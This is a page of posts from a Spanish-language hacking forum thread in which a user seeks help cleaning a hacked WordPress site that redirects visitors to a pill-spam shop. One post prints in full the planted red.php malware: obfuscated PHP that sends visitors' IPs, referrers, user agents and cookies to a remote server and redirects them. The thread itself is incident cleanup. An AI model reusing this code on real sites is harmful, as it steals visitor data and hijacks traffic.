elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
51  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 01:31 am
Cita de: MinusFour en 25 Julio 2014, 01:20 am
Quiero creer que es el R=301 del .htaccess que pusiste. ¿Por cierto como has abierto el archivo .htaccess? ¿Desde notepad? No veo como apache puede estar ignorando todo ese formato innecesario.

Lo he abierto desde Notepad++. Y no entendi lo de R=301. Vuelvo a poner aqui el codigo del .htaccess.

Código:
{\rtf1\ansi\ansicpg1252\cocoartf1038\cocoasubrtf360
{\fonttbl\f0\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red26\green26\blue26;\red246\green246\blue246;\red26\green26\blue26;
\red246\green246\blue246;}
\paperw11900\paperh16840\margl1440\margr1440\vieww9000\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\sl360

\f0\fs22 \cf2 \cb3

# protege el fichero htaccess\
order allow,deny\
deny from all\
 \
# desactiva la firma del servidor\
ServerSignature Off\
 \
# limita la carga de archivos a 10mb\
LimitRequestBody 10240000\
 \
# protege wpconfig.php\
order allow,deny\
deny from all\
 \
#quien tiene acceso y quien no\
order allow,deny\
 \
#denegar desde 000.000.000.000\
allow from all\
 \
#documentos personalizados de error (lo cambias por los tuyos)\
ErrorDocument 404 /notfound.php\
ErrorDocument 403 /forbidden.php\
ErrorDocument 500 /error.php\
 \
# desactiva la navegacion de directorios\
Options All -Indexes\
 \
 \
\
#desactiva el robo de imagenes con la opcion de una imagen personal\
RewriteEngine on\
RewriteCond %\{HTTP_REFERER\} !^$\
RewriteCond %\{HTTP_REFERER\} !^http://(www\\.)?\cf4 \cb5 wilborada.com.ar\cf2 \cb3 /.*$ [NC]\
#RewriteRule \\.(gif|jpg)$ - [F]\
#RewriteRule \\.(gif|jpg)$ http://\cf4 \cb5 wilborada.com.ar\cf2 \cb3 /imagen_robada.gif [R,L]\
 \
# compresion php - usar con precaucion\
php_value zlib.output_compression 16386\
 \
# establece la url canonica (amigable)\
RewriteEngine On\
RewriteCond %\{HTTP_HOST\} ^\cf4 \cb5 wilborada.com.ar\cf2 \cb3 \\.com$ [NC]\
RewriteRule ^(.*)$ http://\cf4 \cb5 wilborada.com.ar\cf2 \cb3 /$1 [R=301,L]\
 \
# protege de comentarios spam\
RewriteEngine On\
RewriteCond %\{REQUEST_METHOD\} POST\
RewriteCond %\{REQUEST_URI\} .wp-comments-post\\.php*\
RewriteCond %\{HTTP_REFERER\} !.*\cf4 \cb5 wilborada.com.ar\cf2 \cb3 .* [OR]\
RewriteCond %\{HTTP_USER_AGENT\} ^$\
RewriteRule (.*) ^http://%\{REMOTE_ADDR\}/$ [R=301,L]\
RewriteRule ^post/([0-9]+)?/?([0-9]+)?/?$ /index.php?p=$1&page=$2 [QSA]\
}

Están seguros que quieren el zip del Wordpress? Faltan pasarse 988.000.000 archivos del FTP a mi PC  :o :o :o
52  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 01:09 am
Cita de: #!drvy en 25 Julio 2014, 01:04 am
Pues.. como no metas todo el wordpress en un .zip xD La idea es descargarlo y buscar archivos que contengan cosas sospechosas.. En windows el buscador de archivos también sirve.

Saludos

Uff, me tardaré un poco en hacer un zip de la web. Denme tiempo. Por lo pronto no se como hacer o que modificar para que ustedes puedan visualizar la web. Yo la veo en Firefox pero en IE me aparece "nos estamos renovando blablabla" (El aviso que ha puesto mi amiga cuando se la hackearon)
53  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 01:00 am
Cita de: #!drvy en 25 Julio 2014, 00:57 am
Desactiva todos los plugins. Busca otros .htaccess. Si tienes una terminal, intenta

Código
  1. fgrep "shop.ru" -r *

Sobre el public_html.

Saludos

Al parecer no tengo terminal. Ya he desactivado todos los plugins y no, no tengo otros .htaccess
54  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 00:48 am
Cita de: #!drvy en 25 Julio 2014, 00:45 am
se a mi tambien xD El index ha cambiado pero lo demas no.

Saludos

Me estoy volviendo loco. En Firefox me accede a la web perfectamente y en IE visualizo que se está renovando blablabla.
Ya estoy tan mareado. Como sigo??? :S
55  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 00:30 am
Cita de: MinusFour en 25 Julio 2014, 00:25 am
A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin.

Actualiza muchas veces, yo matuve apretado F5 2 o 3 segundos y luego me cargó bien la web. Deberías verla. Eso si, los links como dije, siguen redireccionando a la p**a página de pildoras :(
56  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 25 Julio 2014, 00:17 am
Gracias a los 2!!
Ya he borrado todo los red.php (todos eran iguales)
Y si entras a la web que pusiste arriba, redirecciona a la de PHARMACY tal como pasaba en la web.

Veré si activo mi web, que sucede ahora. Los mantengo al tanto en mi próxima respuesta!!

EDITO:
Ya he ingresado a la web http://www.wilboradalibros.com.ar/ pero absolutamente TODOS LOS LINKS que clickeo, me llevan a la web de las píldoras :( :( :(
Qué más tendremos que hacer ahora? :(
57  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 23:50 pm
Me he dado cuenta que el archivo red.php ESTÁ EN TODAS LAS CARPETAS.
WP-CONTENT, WP-INCLUDES, PORTADA.

Estas seguro que es Malware?
El contenido es este:

Código:
<?$tds="http://fbt.yahoo.com/counter.php";$password="fff123106f3430";$g="http://pills-shop.ru";$esdid="counter3";$key="zzzzgb54y45yb45tktbwtberheh6e4wh";?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen('    '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$tt=$tt."&".$key."=".$n;}$tt=urlencode($tt);if(empty($tt)){$tt=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$tt."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y); while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);} $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?>

Perdon que dude, pero me genero esa duda cuando ví que estaba en varias carpetas.
Lo borro de todos lados entonces?


Cita de: MinusFour en 24 Julio 2014, 23:47 pm
Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto:

Código:
Only in wp-includes: red.php
diff -r wp-includes/version.php wp-includes-official/version.php
36,37d35
<
< $wp_local_package = 'es_ES';

De modo que si no era el red.php no creo que haya algo más.

Entonces esto responde a lo que acabo de escribir arriba no?. Borro todos los red.php que vea y pruebo la web?
58  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 23:25 pm
Cita de: #!drvy en 24 Julio 2014, 23:13 pm
Borra el archivo red.php de wp-includes. Es un claro malware.

Sigo analizando por si hay otros.

Saludos

Borrado el archivo red.php.
Sigo aqui a la espera, y ya lo dije mil veces pero lo sigo diciendo igual. GRACIAS!
59  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 23:01 pm
Cita de: MinusFour en 24 Julio 2014, 22:57 pm
¿Por cierto, si estaban usando urls con el mod_rewrite donde están las reglas de wordpress en el .htaccess?

Aqui me has dejado en blanco. No se cuales son las reglas que debe usar wordpress en el .htaccess. Si sabes que debo agregar, dimelo y lo agrego.

Cita de: #!drvy en 24 Julio 2014, 22:38 pm
El tema que pusiste no tiene ninguna redireccion (al menos no vi) ni nada sospechoso a excepción de 2 archivos:

1.txt

Código:
www.wilboradalibros.com.ar/wp-content/themes/wilborada1/1.txt
Tiene un texto muy sospechoso xD

Y wp-query.php que parece un mailer y hace uso de 1.txt.

Va a ser que esta en los includes xD... podrias subir los archivos de esa carpeta (wp-includes) ? Aunque parece que la instalación esta tan tocada, que es mejor borrar y volver a instalar.

Saludos

Aqui está subido el WP-INCLUDES: http://ge.tt/7P2jzIp1/v/0?c
Veremos si hay algo ahí entonces.
Otra persona me ha dicho que quizas por inyección en los comentarios puede estar el problema. Pero no creo, confio más en ustedes que al parecer de a poco nos vamos acercando al problema.
MUCHAS GRACIAS!
60  Programación / Desarrollo Web / Re: Mi Wordpress Hackeado en: 24 Julio 2014, 22:34 pm
Cita de: MinusFour en 24 Julio 2014, 22:28 pm
Lo que quise decir es que puedes restaurar el archivo index.php, en el directorio principal. Te bajas la versión de wordpress que instalaste y subes el archivo index.php que esta en el directorio raiz de wordpress.

Hice lo que me dijiste, baje el Wordpress, y le puse el archivo index.php que contenía este codigo:

Código
  1. <?php
  2. /**
  3.  * Front to the WordPress application. This file doesn't do anything, but loads
  4.  * wp-blog-header.php which does and tells WordPress to load the theme.
  5.  *
  6.  * @package WordPress
  7.  */
  8.  
  9. /**
  10.  * Tells WordPress to load the WordPress theme and output it.
  11.  *
  12.  * @var bool
  13.  */
  14. define('WP_USE_THEMES', true);
  15.  
  16. /** Loads the WordPress Environment and Template */
  17. require( dirname( __FILE__ ) . '/wp-blog-header.php' );

Pero no he visto ninguna diferencia  :huh:
Gracias Minus por seguir ayudando!!
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines